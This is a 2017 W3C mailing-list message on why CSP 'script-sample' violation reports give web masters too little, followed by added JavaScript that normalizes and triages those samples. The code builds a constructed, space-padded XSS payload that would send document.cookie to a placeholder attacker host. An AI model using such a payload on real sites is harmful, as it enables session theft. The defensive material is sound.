
Content-Security-Policy: a "script-sample" report field is inadequate

From: Виноградов Сергей <fdsc@yandex.ru>
Date: Fri, 03 Mar 2017 18:39:59 +0300
To: public-webappsec@w3.org
Message-Id: <4349721488555599@web24h.yandex.ru>
Hello
I would like to give examples of how unhelpful CSP violation reports are ( https://www.w3.org/TR/CSP2/ ).

The "script-sample" report field is shown below:

1. " ;(function() { \n     try { \n         /*..."

2. "/* See license.txt for terms of usage */..."

3. A hacker can pad the CSP report with spaces at the beginning. Whitespace and newlines need to be ignored.
"(function(){                            ..."

4. AJAX scripts can load other scripts. So the web master needs a field which identifies the cause of the script download if the script was loaded from another allowed script.

5. If the script appeared on the page, then the web master needs the HTML environment of this script (to understand how the XSS attack was conducted).
Received on Monday, 6 March 2017 10:24:13 UTC
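The following is an added example, not code from the message above or from any browser or W3C project. It contrasts a naive "script-sample" (the first 40 characters of the blocked inline script, the limit the CSP3 draft specifies) with the sampler the message asks for in point 3, one that skips leading whitespace and comments before taking the sample, and adds a simple receiver-side check that flags samples carrying no usable information. All inputs are constructed; the attacker URL is a placeholder.

```javascript
// Added example (not from the original message). Assumes a 40-character
// script-sample as in the CSP3 draft; all script sources below are constructed.
const SAMPLE_LEN = 40;

// Naive sampler: the first 40 characters of the blocked inline script, as-is.
function naiveSample(source) {
  return source.slice(0, SAMPLE_LEN);
}

// Sampler as proposed in point 3: strip leading whitespace and comments first,
// so padding cannot push the interesting code past the 40-character cut-off.
function normalizedSample(source) {
  let s = source;
  let prev;
  do {
    prev = s;
    s = s.replace(/^\s+/, '');              // leading whitespace and newlines
    s = s.replace(/^\/\*[\s\S]*?\*\//, ''); // leading block comment
    s = s.replace(/^\/\/[^\n]*\n?/, '');    // leading line comment
  } while (s !== prev);                     // repeat until nothing more is stripped
  return s.slice(0, SAMPLE_LEN);
}

// Receiver-side triage: a sample that is empty after trimming, or that begins
// with a comment, tells the web master nothing about what was blocked.
function isUninformative(sample) {
  const t = sample.trim();
  return t === '' || t.startsWith('/*') || t.startsWith('//');
}

// Triage a report body as sent with the Content-Security-Policy report-uri
// mechanism (the {"csp-report": {...}} envelope from the CSP2 spec).
function triageReport(report) {
  const body = report['csp-report'] || {};
  const sample = body['script-sample'] || '';
  return {
    directive: body['violated-directive'] || '',
    sample,
    uninformative: isUninformative(sample),
  };
}

// Constructed inputs.
// 1. Library header comment, exactly 40 characters long: the naive sample is
//    the comment alone (compare example 2 in the message).
const LICENSED = '/* See license.txt for terms of usage */\nvar x = 1;';
// 2. Attacker-padded payload (point 3 in the message): 60 leading spaces push
//    the payload entirely out of a naive 40-character sample.
const PAYLOAD = 'fetch("https://attacker.example/?c=" + document.cookie)';
const PADDED = ' '.repeat(60) + PAYLOAD;
// 3. A report envelope carrying the padded sample.
const REPORT = {
  'csp-report': {
    'violated-directive': "script-src 'self'",
    'script-sample': naiveSample(PADDED),
  },
};

// Stand-alone demonstration.
for (const src of [LICENSED, PADDED]) {
  console.log(JSON.stringify({
    naive: naiveSample(src),
    normalized: normalizedSample(src),
    naiveUninformative: isUninformative(naiveSample(src)),
  }));
}
console.log(JSON.stringify(triageReport(REPORT)));
```

The normalized sampler only helps if the browser applies it before truncating; a report receiver cannot recover characters the browser never sent, which is why the triage function can only flag a useless sample, not repair it.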
